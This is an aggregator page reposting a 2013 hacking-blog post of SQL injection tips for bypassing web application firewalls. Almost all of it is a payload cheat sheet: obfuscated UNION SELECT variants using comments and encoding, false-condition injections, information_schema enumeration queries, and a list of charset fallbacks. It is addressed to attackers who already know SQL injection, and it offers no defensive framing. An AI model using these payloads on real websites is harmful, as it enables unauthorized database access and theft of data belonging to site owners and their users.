Welcome to our

Cyber Security News Aggregator

.

Cyber Tzar

provide a

cyber security risk management

platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.

WAF Bypass Sql Injection Tips

published on 2013-05-16 17:39:00 UTC by lotaya
Content:
This is for who knows sql injection. Sometimes there will be a 403 forbidden error or not acceptable error its because of the WAF (web application firewall) you can bypass this by using the following queries. If u dont know sql injection you can learn it HERE
Order By Not Working?
You can simply bypass it by using group by instead of order by
Union Select Bypassing::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) 

/*!50000union*/+/*!50000select*/ 

UNIunionON+SELselectECT 

+union+distinct+select+ 

+union+distinctROW+select+ 

union+/*!select*/+1,2,3 

union/**/select/**/1,2,3 

uni%20union%20/*!select*/%20 

/**//*!union*//**//*!select*//**/ 

union%23aa%0Aselect 

/**/union/*!50000select*/ 

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ 

id=1+’UnI”On’+'SeL”ECT’ <-MySQL only 

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
after id no. like id=1 +/*!and*/+1=0

+div+0 

Having+1=0 

+AND+1=0 

+/*!and*/+1=0 

and(1)=(0)
False The Url::

=-id=-1 union all select 

id=null union all select 

id=1+and+false+union+all+select 

id=9999 union all select
Order Bypassing do like this

/*!table_name*/ 

+from /*!information_schema*/./*!tables*/ where table_schema=database() 

unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name))) 

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)
used with order::

convert()using ascii) 

unhex(hex())
If ascii dont work you could try:


ujis 

ucs2 

tis620 

swe7 

sjis 

macroman 

macce 

latin7 

latin5 

latin2 

koi8u 

koi8r 

keybcs2 

hp8 

geostd8 

gbk 

gb2132 

armscii8 

ascii 

binary 

cp1250 

big5 

cp1251 

cp1256 

cp1257 

cp850 

cp852 

cp866 

cp932 

dec8 

euckr 

latin1 

utf8
source :  http://hack2play.blogspot.com 
Article: WAF Bypass Sql Injection Tips - published over 11 years ago.

http://hacking-share.blogspot.com/2013/05/waf-bypass-sql-injection-tips.html   
Published: 2013 05 16 17:39:00
Received: 2023 04 02 10:42:10
Feed: Hacking Share
Source: Hacking Share
Category: Cyber Security
Topic: Cyber Security
Views: 1

Custom HTML Block

Click to Open Code Editor